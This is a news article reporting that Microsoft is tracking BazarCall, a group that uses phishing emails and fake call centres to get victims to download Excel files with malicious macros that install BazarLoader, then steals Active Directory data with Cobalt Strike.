Microsoft's cybersecurity researchers are now on the hunt for BazarCall, a criminal group that's using call centers to infect PCs with malware called BazarLoader – a malware loader that's been used to distribute ransomware.
BazarCall (or Bazacall) actors have been active since January and were notable because they used call center operators to guide victims into installing BazarLoader on to a Windows PC.
Palo Alto Networks' Brad Duncan recently detailed the group's techniques in a blogpost. As he describes, the malware provides backdoor access to an infected Windows device: "After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network," Duncan noted.
SEE: Security Awareness and Training policy (TechRepublic Premium)
Usually, the attack starts with phishing emails advising the victim that a trial subscription has expired and that they will be automatically charged a monthly fee unless they call a number to cancel the trial.
The group's activity has now caught the attention of Microsoft's Security Intelligence team.
Microsoft's focus is on the group's phishing emails that target Office 365 users. The example it shows is an email purporting to be from a tech firm claiming that the victim has downloaded a demo version that will expire in 24 hours, at which point they will be charged for the software.
"When recipients call the number, a fraudulent call center operated by the attackers instruct them to visit a website and download an Excel file in order to cancel the service. The Excel file contains a malicious macro that downloads the payload," Microsoft Security Intelligence explain.
Microsoft's security team has also observed the group using the Cobalt Strike penetration testing kit to steal credentials, including the Active Directory (AD) database. Cobalt Strike is frequently used for lateral movement on a network after an initial compromise. The AD theft is a big deal for the enterprise since it contains an organization's identity and credential information.
Microsoft has published a GitHub page for publicly sharing details about the the BazarCall campaign as it tracks it. It's updating details about the phishing emails, use of Cobalt Strike for lateral movement, malicious Excel macros, Excel delivery techniques, and use of Windows NT Directory Services, or NTDS, to steal AD files.